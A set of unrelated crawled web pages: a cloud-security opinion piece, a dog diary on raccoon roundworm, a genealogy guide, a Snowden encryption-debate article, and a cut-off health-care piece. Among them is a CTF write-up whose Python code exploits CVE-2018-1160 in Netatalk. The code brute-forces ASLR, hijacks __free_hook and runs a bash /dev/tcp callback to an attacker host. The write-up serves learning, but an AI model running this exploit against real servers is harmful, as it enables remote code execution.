ideas and poorly implemented technology. T-Mobile, Microsoft, and the Sidekick also found themselves in the middle of a high-profile controversy when there was serious data loss for Sidekick users. This was just another example of the risks that companies and individuals take when they adopt a cloud-based solution and trust another company to treat their data with the same care as in-house IT staff. And while these weren't huge disasters that made everyone pause and consider the cloud a little more carefully, unfortunate examples like that will come. In the discussion following my post about hybrid computing, we brought up some of the security concerns that wise companies are considering when contemplating a move to cloud-based providers like Google. Most of these are either unique to cloud-based providers or made potentially more severe by using cloud-based solutions. The risk of rogue employees planting back doors into a network or systems and then activating them after leaving the organization is always a risk, but I would argue that by maintaining control of your own data, systems, and networks, you have better assurance that all due diligence is being taken to avoid that kind of situation. My shop has a security response policy for when anyone from the IT department with privileged access departs, either voluntarily or involuntarily. An immediate flurry of secure password changes for all admin and domain admin accounts takes place, departed accounts are disabled, and all security policies are reviewed. This isn't a guarantee that a skilled employee who has been plotting won't find some way to bypass our security measures, but it is a measure of control. Each person on my team is also held personally accountable, and because of the size of my organization, any employee who leaves is fully aware that his or her actions are easily traced. The nature of having a close knit team is that the departing employee often leaves behind friends and colleagues, professional networks, and possibly poker buddies. In a large cloud-based corporation, there are hundreds and perhaps thousands of faceless IT engineers, some of whom are under appreciated, bitter, and disenchanted. They have no personal ties or obligations. In their eyes, I'm just a faceless customer of a company they believe has wronged them. There are lots of inherent benefits of having your IT staff part of your local team of employees, and I think this is a lesson that's going to be hard learned over the next few years by companies looking to increase profits and decrease IT headaches by seeking outsourced and off-shored cloud-based solutions. The way I see it, I've been predicting these situations for a couple of years now, and much of the tech industry has been gleefully riding into the sunset, proclaiming the cloud-based future of PC computing. This doesn't mean that I'm right, but it does mean that I'm thinking about it, which is more than a lot of the industry is doing. While most people are hoping for the dust to settle with a clear and obvious path to follow for the future, each mishap or incident makes the future look that much more obscured. There are a lot of compelling reasons to consider cloud-based solutions, and like everyone in the IT industry, I'm looking at where the cloud fits into my IT road map for the future. I think it would be irresponsible for any IT manager not to. The cloud will affect the way we all do business, the models we implement, and the economic impact those solutions have on our IT shops and our companies. At the same time, the cloud pushes us forward into a future where the checks and balances and best security practices of the past are simply ineffectual, and the only real alternative is, "jump in, hope for safety in numbers, and know that while some of the herd might get taken down, it will unlikely be you." The success of the cloud depends on us adopting certain attitudes. After all, security is mostly an illusion – locks that keep the honest people honest. The fact is that even among the most talented IT shops in the world, a single human error lets the bad guys in. The bad guys, on the other hand, just sit back, and try and try again, confident that eventually they'll find an unlocked door or a lock that isn't any good. Anyone who works in security must acknowledge that fact. I'm also well aware that the bad guys are far smarter than I am. I've known brilliant guys in the security industry, but I don't think any of them have broken 1024 bit RSA encryption by strangling the CPU of voltage. My fear is that the keyholes you find in the cloud could be large enough to fit a Mac truck. So, what do you think? Am I being overly paranoid and too conservative in my opinion about adopting cloud strategies? I really want more feedback and dialog about this, because I'm strongly considering advocating several cloud solutions in my day job. Do we just all jump in and trust these large faceless corporations with purposefully limited SLAs and tons of plausible deniability to be good shepherds of our electronic data? Please share your feedback in the discussion thread.See also Donovan Colbert has over 16 years of experience in the IT Industry. He's worked in help-desk, enterprise software support, systems administration and engineering, IT management, and is a regular contributor for TechRepublic. Currently, his professional role is as a Linux support engineer for a fast-growing Linux/FOSS consultancy group. You can follow him @dcolbert on Twitter or his personal blog, located at http://donovancolbert.blogspot.com.
<urn:uuid:36cd5e2d-e5ec-4ed1-be20-27da3c765cef>
CC-MAIN-2017-04
http://www.techrepublic.com/blog/techrepublic-out-loud/cloud-based-solutions-open-the-door-for-greater-security-concerns/
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285289.45/warc/CC-MAIN-20170116095125-00149-ip-10-171-10-70.ec2.internal.warc.gz
en
0.976929
1,591
1.757813
2
April 30th 2012 1:11 pm [ View A Comments (4) ] Ick! Ick! our first diary entry and it has to be something like this.. We were informed by our dogtor last week that there have been six reported cases of raccoon roundworms in dogs in our little corner of the world. Four recovered but two went to the Bridge. Apparently this particular worm can be very serious for us dogs, sometimes fatal. It was because of this that the dogtor recommended we be wormed monthly, but just how many months we should do it we don't know. We had never heard of this worm before so we went searching for info, and here's what we learned.... Dogs can become infected from coming into contact with raccoon feces, from ingestion of the eggs, or from ingestion of animal tissue that is infected with the roundworm (e.g., rabbits, birds, etc.), or from close contact with other infected animals. It can often be treated in adult dogs, but is almost always fatal for puppies. (note: same for cats and kittens). In addition, because the worm sometimes attacks the brain and nervous system, this infection may be mistaken for rabies. If rabies is suspected, you may wish to ask your veterinarian to test for the presence of the roundworm. There is lots of info if you query "raccoon roundworm dogs", here are a few of the sites we visited: Ohio State University factsheet Humans can get it too Since we go to parks/trails where there are raccoons, mom decided better safe than sorry, she picked up meds (Strongid) from the dogtor and we had our first dose today - here's hoping everything will be ok. Stay safe out there every fur! BOL BOL This is good info to know. So many of us have raccoon neighbors. YIKES!!! Dose darn waccoons an' dere yucky werms an' germs an' junk :( Fanks fur tellin' us 'bout it, wadies! that sounds very scary. We don't have raccoons here, but we have lots of other types of worms, including French heartworm, so we take a pill every month! Oh no! Just something else for mommy to worry about; probably not so much in our neck of the woods. But we do like to travel. I'm not enjoying summer so much this year - the heat!.
<urn:uuid:3d56d6cc-ae78-4b61-bbd7-880f65a8d5a2>
CC-MAIN-2017-04
http://www.dogster.com/dogs/1112230/diary/Little_womens_words/777853
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281151.11/warc/CC-MAIN-20170116095121-00117-ip-10-171-10-70.ec2.internal.warc.gz
en
0.939973
520
1.742188
2
When beginning your family history research, it’s easy to think that it will be simple to keep track of what information you have and what you have yet to find. You’ll quickly discover that it’s not so simple. Below are tips for organizing both your genealogical research and your findings. Organizing Your Research Spending more time tracing your family history is the ultimate goal. Starting out with research logs and task lists will allow you to do just that. Research logs are an excellent way to keep track of the research you have already accomplished. Good research logs have a place to record the following information: - Date of research (be sure to include all 4 digits of the year) - Repository (archive, library, cemetery, or vital record office) - Call number (manuscript number, library call number, or microfilm number) - Description of source (put your full source citation) - Comments or Results (What did you look for? Did you find it? Was the record hard to read?) - Miscellaneous fields, such as: - Time period - Condition of source - How the source was searched (index or page-by-page) - ISBN (for locating a book elsewhere) Download our research log to start organizing your research. Task Lists or To-Do Items Note questions when they arise—you may not remember the question later. Tracking this can be done in a variety of ways: - Use to-do items, logs, or task lists found in your genealogy software - Use a general word processing, spreadsheet, or database program - Keep a small notebook with you to jot down research questions Organizing Your Findings Your computer is an important organizational tool. Beyond recording and organizing your findings within a genealogical software program (see our software comparison chart), there are many other programs that can assist you. Organizing (and Preserving) Your Family Stories Preserve the family stories you find, know, or receive from family members. - Word processing program - Genealogy software (easier to locate the family story as it is attached to an individual) Organizing Data as You Go You may come across someone whose connection to your family is unclear, however, you don’t want to lose the information. There are many programs that can assist with this: - Census data - Census spreadsheets can be created in any spreadsheet program - Clooz (a Windows desktop application that helps organize and analyze data) - Cemetery and obituary transcriptions - City directories, deeds, and more - Create your own transcriptions in a word processing program Other Valuable Programs Consider using a Notebook program to track every note, detail, photo, source, or URL: Organizing Your Files As you progress with your research you will find that files multiply exponentially. The documents and images you uncover are all part of the process. File them in a way—electronically, physically, or both—in which you can easily find them. Most filing systems rely on certain principles: arrange the documents in notebooks or file folders; use an index or table of contents; be consistent. Even if you are determined to go a paperless route, there are still some documents, diaries, and photographs you will have in a non-digitized version. Organize these in a manner similar to your electronic files. Regardless of what system you use or where you store your files, remember to be consistent with file names, localities, and arrangement. Build a hierarchy of folders. Below is an example that leads to files for Lemuel Patraw (where each level is a sub-folder of the previous one): - Johnson Family Tree - Patraw Surname - Lemuel Patraw - Patraw Surname When naming files, especially those of documents, include details on the source. Some examples: - File name: 1900 Nati no 122 Nataloni fhl2221027.tif — 1900 birth, record no. 122, surname Nataloni found on FHL microfilm 2221027 - File name: Lemuel patraw ww1 st paul db4.jpg — World War I Draft card for Lemuel Patraw, who registered with the St. Paul, Minnesota, Draft Board No. 4 Organizing Digital Images If you are working with a lot of digitized photos, keep a log of where they are stored. Items to keep in your log could include: - File name - Date of file - Description of file (subject of image) - Individuals included - Location of the original (should you ever need to replace your digital file) When storing your images, whether taken with a camera, scanned from a microfilm, or saved from an online digitized document, it is always a good idea to store them in multiple locations, including: Organizing Bookmarks and Email If it is easier to do an online search for a site you are trying to reach instead of locating it in your list of favorites or bookmarks, then it is definitely time to organize your links. - Take advantage of your browser’s “Favorites” or “Bookmarks” - Make sure you create general folders such as: - General Genealogy Use a similar approach for email. “Filters” within your email program direct messages into certain folders. This way you can work just on e-mails dealing with a given family, rather than jumping from one to the next as you open each email in your Inbox. - Online seminar by Rhonda R. McClure, Getting Started in Genealogy - Rhonda R. McClure, Portable Genealogist: Organizing Your Research (Boston: NEHGS, 2013) - Sharon DeBartolo Carmack, Organizing Your Family History Search: Efficient & Effective Ways to Gather and Protect Your Genealogical Research (Cincinnati, Ohio: Betterway Books, 1999) - William Dollarhide, Managing a Genealogical Project (Baltimore, Md.: Genealogical Publishing Company, Inc., 1999) Want to maximize your research? The experts at NEHGS can help! We offer a number of services that can help you break down brick walls and expand your research. Meet one-on-one with our genealogists Want research guidance from a professional genealogist? Our experts provide 30-minute to two-hour consultations in person or by phone. - Find elusive ancestors—Whether you are searching in the U.S. or abroad, in the 17th or 20th century, our genealogists have the knowledge to assist you. - Locate and use records—Vital records, military records, deeds, probate, and more—if you’re wondering where to look for them, how to read them, or what data you can find in them, we can guide you. - Get more out of technology—Feel like you could be making better use of your genealogy software? Curious about websites and databases that might be relevant to your research? Let us help! Hire our experts in Research Services Whether you are just beginning your family research or have been researching for years, NEHGS Research Services is here to assist you. Our team of experts can: - Conduct hourly research - Break down “brick walls” - Retrieve manuscript materials - Obtain probate records - Research and prepare your lineage society application - Organize your materials and files - Write narrative biographies about your ancestors - Create customized family charts
<urn:uuid:e4a57761-ecd5-4fbe-8337-2a0cfcf62f07>
CC-MAIN-2017-04
https://www.americanancestors.org/education/learning-resources/read/getting-organized/
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281353.56/warc/CC-MAIN-20170116095121-00070-ip-10-171-10-70.ec2.internal.warc.gz
en
0.907085
1,594
2.8125
3
This blog post covers: - Defeating ASLR - Execution Control Hijacking through __free_hook - A looooot of bruteforcing It was a beautiful evening in my place of residence. I was wasting my time watching random YouTube videos, and then I finally decided to do something with my life, and go back to sharpening my CTF skills. So I logged in to pwnable.tw for the first time in literally ages, and there it was, in front of me, a new challenge named CVE-2018-1160. The task was simple, develop a 1-day exploit for this particular vulnerability. A little bit of research lead me to this blog post by Jacob Baines, the person who originally found the vulnerability. The principle is really simple: Netatalk, which is an open source program, that allows Unix-Like operating systems to act as file systems for Macintosh computers, could potentially memcpy data out of bounds. Excuse me, a what?! In simpler words: Netatalk could access memory regions that the original program was not meant to. I am not going to go too much into details here, as Baines’ blog post explains greatly how the vulnerability works, so please go and read it thoroughly. Then come back here for a more universal exploit. Baines exploit on the blog post that you should have read by now, does not work on systems that have ASLR enabled. In a nutshell: ASLR is a security feature that aims to make an attacker’s life harder, by adding some randomness to where we can find things in memory. For example, imagine that you want to redirect the program execution to a piece of code, that lives in memory address 0xCAFEBABE. If ASLR is not enabled, you know that the code will always be in the same place, and your exploit can simply overwrite the RIP to jump to it. However, the world is rarely that kind to us, exploit developers, and most of the times ASLR is indeed enabled. This means that you don’t know the exact address where your function is in memory (maybe 0xCAFEBABE or maybe 0xDEADBEEF). Exploitation is not impossible though! ASLR gives you an extra task: first figuring out where things are in memory, and then redirecting program execution. This is the case when dealing with the Netatalk challenge, and now I am going to describe how I defeated ASLR and got the flag Expanding the original exploit Although ASLR can look impossible to beat at times, there are a few tricks that can be leveraged to leak one single address, and as it turns out, sometimes that is all we need. Brute-force all the things! As Baine’s blog post explains, the exploit works by overwriting the dsi->commands buffer address. The problem right now is that we don’t know which address we need to write there. One of the first things I did was trying to gain a deeper understanding on the basic working model of the Netatalk server works, and it is quite simple: There is a main program that listens on the network, then when a client connects it forks a new process which takes care of handling the new connection, the main process (parent) goes back to listening. Simply reading the code did not gave me any useful idea, but I got a hint from a few other blog posts: ASLR is weak against brute-forcing attacks. That is when things I got my first idea: - As I said before, Netatalk forks a new process after a connection is made. - When a process it’s forked, the child process is an exact copy of the parent process. - If the child process crashes, the parent is unaffected in this case. How can I use this to brute-force the address of dsi->commands? The answer is to guess one byte of the address at a time, if we guess wrong, the child process will crash, and our connection to the server will be broken, on the other hand if the guess is correct, the server will return us some data. Ok, let’s jump to the first code snippet of the exploit: I begin by defining a few helper functions (I took them from the Baine’s blog, not gonna lie), then I proceed to open a connection to the Netatalk server and to start brute-forcing! from pwn import * import struct import sys import time # Creates a DSI packet to send to the server with the given command # and payload. # command should be 1 byte def CreateDSIRequest(command, payload): dsi_header = b"\x00" # "request" flag dsi_header += command dsi_header += b"\x00\x01" dsi_header += b"\x00\x00\x00\x00" # data offset dsi_header += struct.pack(">I", len(payload)) dsi_header += b"\x00\x00\x00\x00" # reserved dsi_header += payload return dsi_header # Creates an DSIOpenSession Request that exploits the vulnerability # overwriting the address of dsi->commands def OverwriteCommandBuffer(target_addr): dsi_payload = b"\x00\x00\x40\x00" # client quantum dsi_payload += b"\x00\x00\x00\x00" # overwrites data size dsi_payload += struct.pack("I", 0xdeadbeef) # overwrites server quantum dsi_payload += struct.pack("I", 0xf00dbabe) # Ids dsi_payload += target_addr # commands address to overwrite dsi_opensession = b"\x01" # attention quantum option dsi_opensession += struct.pack("B", len(dsi_payload)) # length (/)o,,o(/) dsi_opensession += dsi_payload # \x04 is the open session command. return CreateDSIRequest(b"\x04", dsi_opensession) and then I use those helper functions to trigger the vulnerability: # Helper function to send data and handle exceptions when waiting for the response. def send_data(data, conn): try: conn.send(data) resp = conn.recv() return data except Exception as e: return None ip = 'NETATALK SERVER ADDR' port = 'SERVER PORT' # Leak the addr of where dsi->commands is allocated (stack? heap?) leak_addr = b"" # The addr is 8 bytes but only 6 are used, so we are going to bruteforce until we find 6 bytes. while len(leak_addr) < 6: for i in range(256): conn = remote(ip, port) candidate_byte = struct.pack("B", i) # We use the helper function to overwrite one byte of the commands buffer # at a time. data = OverwriteCommandBuffer(b"\x00\x01", leak_addr + candidate_byte) response = send_data(data, conn) # None in this case means the connection is broken (process crashed). if response is not None: # So if we received something, it means our guess was correct leak_addr += candidate_byte break conn.close() # Pretty-print the address in hex print(hex(struct.unpack("<Q", leak_addr.ljust(8, b'\x00')))) You may be wondering: Why does the process crash when we guess the wrong data? Well it seems that netatalk, after receiving a create session request, attempts to write some data to the dsi->commands buffer. So if the guess is wrong, the program will try to write something to a memory address it doesn’t have access to, thus it will crash. Running this small piece of code on my local virtual machine (btw you can use the following command to run the neatatalk server: export LD_LIBRARY_PATH=$PWD; ./afpd -d -F ./afp.conf) gives me the address: 0x7f299d000000, this first leaked address is all we need to start building a scarier exploit. We have an address! now we have to find out how to make something useful out of it. Our ultimate objective is to read the flag file. Therefore I decided that a return to libc attack was the way to go. In a nutshell, this attack involves figuring out the base address of libc and then redirecting the program execution to a function there, in this case we are going to return to the system function. Ok so our next task is: using the address we just got to figure out where libc lives in memory If we take a look at the memory map of a child process (cat /proc/process_id/maps) we can find where libc starts (in a program running locally of course) Our goal is to go from 0x7f299d000000 (the address we got in the previous step) to 0x7f299e3a0000 (libc base address). Figuring out where libc is in memory is the hardest part of this CTF. I tried (and failed) testing many ideas until I finally came up with something that worked consistently. First I thought I could maybe compute the difference between the address that was just leaked, and the base libc address and that maybe this difference would be a constant. However this is not the case, the delta between both addresses will be different depending on the kernel version. Then I took a closer look at the process memory map to see where is the memory region that contains our leaked address. And I asked myself: Can I figure out the base address of this memory region? Would it be easier to calculate the base libc address from this address? As it turns out the answer to both questions was yes Memory Address Minimization Search Algorithm How do we go from 0x7f299d000000 (leaked address) to 0x7f299cdff000 (base address)? First of all both addresses are very close (the first two bytes are the same: 0x7f and 0x29), and also the third byte is just off by one (0x9c and 0x9d). This last fact is interesting because it means that when our leak algorithm tried 0x9c, it landed into an invalid memory region, but once it incremented that guess by one it was back into a valid section. So I came with this idea: - Let the base_addr_leak be the first two bytes of the commands leak address - Starting from byte 3 and until byte 6 repeat the following - Bruteforce the byte - if the byte found is at position 6, add it to the base_leak_addr and finish the algorithm. - Otherwise, subtract one from the byte and set the following bytes to \xFF - Send a new request with this other address, if we receive a response then assign the (byte – 1) to base_leak_addr, otherwise assign byte Practical example: when we encounter the situation where we have bruteforced 0x7f299d we are going to send a request with 0x7f299cffffff. Since this address is valid, we will receive a reply from the netatalk server, so we know that the right byte guess is 0x9c not 0x9d. Once this algorithm finishes, it results in the leak of the base address of the memory region: 0x7f299cdff000 Heads up! the memory address in the code are encoded in little endian, that’s why you may see we refer to the bytes in reverse order leak_addr_byte_array = list(leak_addr) # Leak addr here is the leak of the commands addr # Try to find the base addr of the memory section index = 3 while index >= 0: print(leak_addr_byte_array) for i in range(256): temp_array = list(leak_addr_byte_array) print("bruteforce base addr") print("trying byte " + str(i)) print(temp_array) temp_array[index] = i conn = remote(ip, port) data = OverwriteCommandBuffer(bytes(temp_array)) response = send_data(data, conn) conn.close() if response is not None: if index == 0 or i == 0: leak_addr_byte_array[index] = i break temp_array[index] = i - 1 for j in range(index - 1, -1, -1): temp_array[j] = 0xFF conn = remote(ip, port) data = OverwriteCommandBuffer(b"\x00\x01", bytes(temp_array)) response = send_data(data, conn) conn.close() if response is None: leak_addr_byte_array[index] = i else: leak_addr_byte_array[index] = i - 1 break index -= 1 base_val = u64(bytes(leak_addr_byte_array).ljust(8, b'\x00')) # This is our leak base addr. Gaining execution control Let’s quickly remember what was the goal before I dived the previous algorithm: find out where libc lives in memory. In order for me to explain how I managed to find the right offset between the leak base address and libc I need to explain how the execution control portion of the exploit works (please bear with me, it will all make sense in the end). Grabbing a disassembler I took a look at how the system libc function expects to receive its arguments: the first line is a check to make sure that whatever is stored in the rdi register is not null (0), and this means that system expects the argument (pointer to the command string) to be passed inside this register. So the next mission is to figure out the next couple things: - which command to execute? (easy! something like /bin/sh or cat flag…) - Where to store this command? - How to redirect execution control to system? Let’s begin with the last question. At first I had no idea how to redirect program execution, then, I came across the malloc hooks and some random exploit sources explaining how to exploit them. The basic idea is that if you can overwrite the address that one of those hooks points to, it will redirect the program execution once the respective function is executed. So I picked libc free as my vehicle to start the execution flow hijacking, let’s take a look at it’s disassembly: Here we can see that whatever __free_hook_ptr is pointing to is loaded into rax and if whatever is loaded is not NULL (0), then the execution flow gets redirected This is the gate to hijacking program control, now the next step is to find small snippets of assembly code (called gadgets) in the netatalk or any of its linked libraries, that can be leveraged to set the state we want and make a call to system, this is a variation of return oriented programming. Our next three gadgets are going to help set the state: - setcontext + 0x35: This is an amazing gadget, it allows us to set the every single register based on what rdi register is pointing to! - fgetpos64+0xCF: Allows to set rdi to whatever rax is pointing to, and then jump to a position relative to rax - dl_openmode + 0x38: Loads whatever is stored into _dl_open_hook (yes, another hook we can overwrite!) and then jumps to where this value is pointing to Therefore, the final exploit workflow goes like this: - Overwrite __free_hook to to point to the dl_open_mode gadget - Set the _dlopen_hook pointing at the fgetpos64 gadget - fgetpos will in turn set the rdi register and then call the setcontext gadget - setcontext will put all the registers in a state ready to call and jump to system - system will be executed and we would have successfully completed the exploit! Finally: where are all the parameters, command string, etc. going to be stored? Turns out that the space between __free_hook and _dl_open_hook is a memory region with decent size (couple of hundreds of bytes) that we can freely write into. Since dsi_opensession seems to write some data to dsi->commands before it returns, the exploit is going to give a small buffer to accommodate it. We will trigger the exploit to make it to point to the address of __free_hook – 0x10 (give it a 16 byte extra space). The exploit will be triggered with the following steps: - A opensession request will overwrite the commands pointer to the desired address - Send a execute command request with our payload, this will write all the desired values in the right memory positions - Invoke a close session command, this will call the free function and will kick in the hijacking of the execution control. The final payload of the exploit looks like this: |8 Bytes of filler data (not important)||address of fgetpos64 gadget (8 bytes) (rax points here after executing dl_open_mode_gadget)||address of dl_open_mode_gadget (__free hook points here)| |filler data (16 bytes, to align [rax + 0x20] with the address of setcontext)||address of setcontext gadget [(rax + 0x20])||parameters to setcontext in the following order (each one is 8 byte. Most of the values are random except for rdi, rsp and return address):| rdi=free_hook_addr+0xB0 (commands buffer), rsp=base_addr + 0x400 -0x8 (some random memory position where the stack can be written, the -0x8 is to 16-byte align the stack) total size: 0x88 bytes |filler bytes (8 bytes)||command to execute lives here! (len(command) bytes)||super huge filler size of dl_open_hook_addr – free_hook_addr – number of bytes we have already written| |free_hook_addr – 0x08 (_dlopen_hook points here)| Let’s see how this madness looks in code (note that the value of libc_offset is needed, consider that for testing purposes this value is calculated manually by looking at the memory map of a local process) ip = 'netatalk server ip' port = 'netatalk port' e = ELF('path to libc.so.6') def do_exploit(libc_offset, cmd): # Where base_val is the base addr we leaked previously print("base program addr at " + str(hex(base_val))) base_libc_addr = base_val + libc_offset print("base libc addr at " + str(hex(base_libc_addr))) free_hook_addr = base_libc_addr + e.symbols['__free_hook'] print("free hook addr at " + str(hex(free_hook_addr))) dl_open_hook_addr = base_libc_addr + e.symbols['_dl_open_hook'] print("dl_open_hook_addr at " + str(hex(dl_open_hook_addr))) dlopen_mode_addr = base_libc_addr + e.symbols['__libc_dlopen_mode'] + 0x38 print("dlopen_mode_gadget_addr " + str(hex(dlopen_mode_addr))) fgetpos64_gadget_addr = base_libc_addr + e.symbols['fgetpos64'] + 0xCF print("fgetpos_64_gadget_addr " + str(hex(fgetpos64_gadget_addr))) setcontext_gadget_addr = base_libc_addr + e.symbols['setcontext'] + 0x35 print("setcontext_gadget_addr " + str(hex(setcontext_gadget_addr))) system_addr = base_libc_addr + e.symbols['system'] print("system addr" + str(hex(system_addr))) free_hook_addr_bytes = struct.pack("<Q", free_hook_addr - 16) conn = remote(ip, port) print("Starting connection") data = OverwriteCommandBuffer(b"\x00\x01", free_hook_addr_bytes) print(send_data(data, conn)) # First start with an initial filler (8 bytes) payload = b"\x41" * 8 # Put the addr of our getpos gadget (7 bytes) payload += struct.pack("<Q", fgetpos64_gadget_addr) # Keep track of the total size of this first portion of buffer, we will need to calculate the size of a big filler # between free_hook and open_mode_hook, the amount of bytes we write in between is important. Note that we don't care # about the previous 16 bytes as they are before the addr of __free_hook. total_size = 0 # Put the pointer the dlopen_mode gadget (8 bytes), this will override __free_hook payload += struct.pack("<Q", dlopen_mode_addr) total_size += 8 # Now we need to put some filler bytes (filler no. 1), the getpos64 gadget moves execution to whatever is pointed # by rax + 0x20, currently rax points at the addr of getpos gadget, so we insert 0x10 bytes of filler # to allign things (0x20 - 0x8 (size of getpos addr gadget) - 0x8 (size of dlopen_mode_addr)) payload += b"\x41" * (0x10) total_size += 0x10 # Put the addr of our setcontext gadget 8 bytes payload += struct.pack("<Q", setcontext_gadget_addr) total_size += 8 # Set the arguments for the setcontext gadget r8=0 r9=1 r12=1 r13=1 r14=1 r15=1 rdi= free_hook_addr + 0xB0 # cmd buffer rsi=0x1111 rbp=0x1111 rbx=0x1111 rdx=0x1211 rcx=0x1211 rsp=base_val + 0x400 - 0x8 rspp=system_addr # system payload+=flat( r8,r9, 0,0,r12,r13,r14,r15,rdi,rsi,rbp,rbx,rdx,0,rcx,rsp,rspp ) total_size += 136 # Random byte to align things payload += struct.pack("<Q", 0x42) total_size += 8 # Put the command toe xecute payload += cmd total_size += len(cmd) # Finally we write the big filler between the hooks payload += b"\x00" * (dl_open_hook_addr - free_hook_addr - total_size) payload += struct.pack("<Q", free_hook_addr - 8) data = CreateDSIRequest(b"\x02", payload) print("poison!") print(send_data(data, conn)) # Create the close request data = CreateDSIRequest(b"\x01", b"") print("close!") print(send_data(data, conn)) conn.close() Finding libc, part 2 When I first write the exploit I simply calculated the libc offset on a ubuntu 18.04 virtual machine and prayed that my remote (pwnable) target had the same offset. But that did not work… These offsets change depending on the Kernel version, and I had no way to determine which version my remote target was running. I thought I had hit a dead end, when I had one final moment of clarity: When taking a look at the memory map I noticed that the offsets between memory regions is always 0x1000: Furthermore, the offset between our dear old base_addr and the libc_addr seemed to be around 0x5000000. So it occurred me: what if I also bruteforce this offset? I would only need to do increments of 0x1000 and thus the search space is not that big. So I decided to do exactly that! Here is the final code to find out this offset: libc_offset = 0x4000000 response_ip = b"AN IP YOU CONTROL" response_port = b"A PORT YOU CONTROL" cmd = b'bash -c "echo %s > /dev/tcp/%s/%s"\x00' % (bytes(hex(libc_offset), encoding='utf8'), response_ip, response_port) while libc_offset < 0x6000000: print(hex(libc_offset)) do_exploit(libc_offset, cmd) libc_offset += 0x1000 As ugly as it looks, we simply iterate over all the values between 0x4000000 and 0x6000000 with increments of 0x1000. Once we hit the sweet sweet spot of the right offset, all the pieces of the exploit will be together, and the right offset will be echoed back to us to an ip and port we control. I executed this final piece of code and went to bed. In the morning I woke up to the surprise that it had worked perfectly! I had the offset of libc and therefore I could execute any command I wanted. And this is how I captured the flag and defeated ASLR Conclusion: Innocent mistakes can carry serious consequences Let’s stop for a second and consider everything that just happened: just because someone forgot a simple size check when copying data to memory, the door to an arbitrary code execution exploit was opened. The consequences of apparent innocent mistakes in memory unsafe languages can be quite scary indeed. Also, while the vulnerability itself is simple, the exploit is not that simple (just look at everything I had to write to explain how I managed to do it). My exploit is not perfect and I am sure this process can be optimized a lot. But I wanted to remain as close to my final result as possible to show that even someone with little practice can come up with an exploit, it is only a matter of a loooot of determination. Solving this CTF was painfully fun, it took me weeks. And at points I was almost certain I may not be able to crack all the pieces together, but in the end I managed to do it. I hope that this blog post is helpful to you in some way. Either clarifying how certain exploitation techniques work or pointing you in the right direction on how to solve a CTF. For now, until next time! May you live until you die!
<urn:uuid:e0f4afc3-fcfa-46f9-9ed9-4c9f3ba7dc53>
CC-MAIN-2022-33
https://tacopwn.net/blog/2021/08/02/cve-2018-1160-expanding-the-original-18-year-old-vulnerability-exploit/
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882572221.38/warc/CC-MAIN-20220816060335-20220816090335-00077.warc.gz
en
0.868169
6,005
2.015625
2
Any debate in the United States that includes Edward Snowden, who leaked troves of classified information to Glenn Greenwald and Laura Poitras in 2013, is bound to look a little unusual. Snowden is currently in Russia on indefinite asylum as he remains sought on espionage charges by federal authorities. Nonetheless, televised, he took to the stage at New York University on Tuesday to debate CNN’s Fareed Zakaria on how the government should respond to the security challenges posed by encryption. The debate focused on whether law enforcement should be able to access any and all encrypted communications as long as it had a court order, a question that has only become more pressing with major messaging apps WhatsApp and Viber recently boosting their users’ privacy with end-to-end encryption. Zakaria argued that a court order should authorize the government to seize any information it requires and that obstructing this process amounts to a threat to national security. He said that a fully encrypted bank would allow embezzlers a safe haven from any kind of investigation. “I understand within a democracy, you have to sacrifice liberty for democracy at some point,” Zakaria said, according to The Intercept. “You cannot have an absolute zone of privacy.” Snowden responded by pointing to the inherent technological challenges in making all encrypted data available for the taking. He argued that what amounts to a “backdoor” to encryption would never be truly secure in the government’s hand and would jeopardize the fundamental security of the internet. “For the government to unlock everything there has to be a key to everything. Every other person in the world can find that key and use it too,” he said. “It’s a fundamental problem of science.” Encryption may pose difficulties for law encryption, but that doesn’t mean we shouldn’t accept those challenges in the greater scheme of things, Snowden argued. Law enforcement can still break into encrypted technology if it gains access by discovering passwords or even finding individual backdoors, like the FBI did with the San Bernardino iPhone. “Encryption is not an unbreakable wall,” Snowden said. “Or if it is, it is one we can get around, if we are patient, if we are careful, if we think and plan how to go about our investigations.” Zakaria then acknowledged that ditching encryption altogether, as a recent bill in the U.S. Senate would do, is also a poor answer to these questions, so the government will have to work to understand the obstacles faced by technology companies in accessing encrypted data. “If WhatsApp says we literally do not know how to write this code — WhatsApp could demonstrate to a court that they don’t have to do it,” Zakaria said. At the end, he stressed the need to address the government’s role in investigations before another major attack made any reasonable debate irrelevant in the ensuing political circus. “We do face real threats out there. There are people out there trying to do bad things. Once they happen, the government will be given carte blanche,” he said. As a whistleblower who has worked to curb the excesses of the post-9/11 security state, Snowden was only too happy to agree.
<urn:uuid:118bf40e-a5a5-4909-b59b-203d8332c55e>
CC-MAIN-2022-33
https://www.inverse.com/article/14875-snowden-zakaria-encryption-debate
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882571538.36/warc/CC-MAIN-20220812014923-20220812044923-00466.warc.gz
en
0.959346
685
1.914063
2
On January 30th, 2018, Amazon’s Jeff Bezos, Berkshire Hathaway’s Warren Buffett, and JP Morgan Chase’s Jamie Dimon announced a new partnership to address the health care crisis. With a stated aim of “improving employee satisfaction and reducing costs,” the three companies plan to “provide US employees and their families with simplified, high-quality, and transparent health care at a reasonable cost”—all while operating “free from profit-making incentives and constraints.” While Amazon, Berkshire Hathaway, and JP Morgan Chase are not the first companies to proclaim a desire to decrease their health care costs and disrupt the marketplace, this unique combination of partners deserves our attention. If anyone can tackle such an enormous challenge, it’s these three titans of their respective industries. US Spending on Health Care in 2016 v. 2017 Assets for Amazon & Friends Founded in 1994, Amazon is the newest of the three companies involved in this venture. However, Amazon’s assets exceed $131 billion and it employs more than 500,000 people. Berkshire Hathaway boasts far more in assets—$702 billion—and employs 370,000 people, while JP Morgan Chase boasts $2.5 trillion in assets and employs 250,000. Together, these three companies employ more than a million people and have more than $3 trillion dollars in assets to support whatever project, venture, or company that will emerge from this agreement. In health care, does size matter? Yes and no. It’s not that “might makes right” in the health care industry. As illustrated above, size matters because these groups have ample reserve capital and long-term thinking embedded in their strategies. This partnership signals something new: an attempt to build fresh internal approaches to health care spending, rather than a venture capital-driven tactic to immediately maximize investments. If Amazon, Berkshire Hathaway, and JP Morgan Chase reduce or level out their own health care costs, their strategy could potentially serve as a blueprint for other large employers. Given that possibility, coupled with the vast resources available to them, then yes, size could matter. Or it could not—one million employees are a lot, but they represent an incredibly small portion of overall health care costs across the country. Even if Amazon, Berkshire Hathaway, and 